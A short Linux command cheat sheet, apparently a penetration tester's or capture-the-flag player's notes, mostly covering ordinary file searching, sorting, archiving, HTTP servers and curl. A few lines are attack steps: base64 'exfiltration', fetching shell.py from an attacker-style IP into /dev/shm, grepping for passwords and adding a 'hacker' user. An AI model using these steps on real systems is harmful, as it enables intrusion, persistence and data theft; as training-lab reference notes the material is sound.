Linux

PE Tool

PEASS-ng/linPEAS at master · carlospolop/PEASS-ngGitHub

Commands

#Exfiltration using Base64
base64 -w 0 file

#find a file 
find -maxdepth 1 
find ./ -type f  
find ./ -type d 
find ./ -name abc* 
grep -lR password *.txt 
find ./ -name webmin 2>/dev/null 

#query file grep functions
cut –d ":" -f 1 /etc/passwd 
echo "hello::there::firend" | awk –F "::" '{print $1, $3}' 
cat access.log | cut –d " " -f 1 | sort | uniq –c |sort –urn 

#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'

#Count
wc -l <file> #Lines
wc -c #Chars

#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates


#Compare File 
comm fileA.txt fileB.txt 

#Download 
wget 10.10.14.14:8000/shell.py 
curl -vvv 'https://10.10.14.14:8000/shell.py' -b "cookie" -k -o /dev/shm/shell.py
-k =>  tag in the end to disable ssl checks done by curl

#Unzipp
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz

#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker  


#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80

##Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content

#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob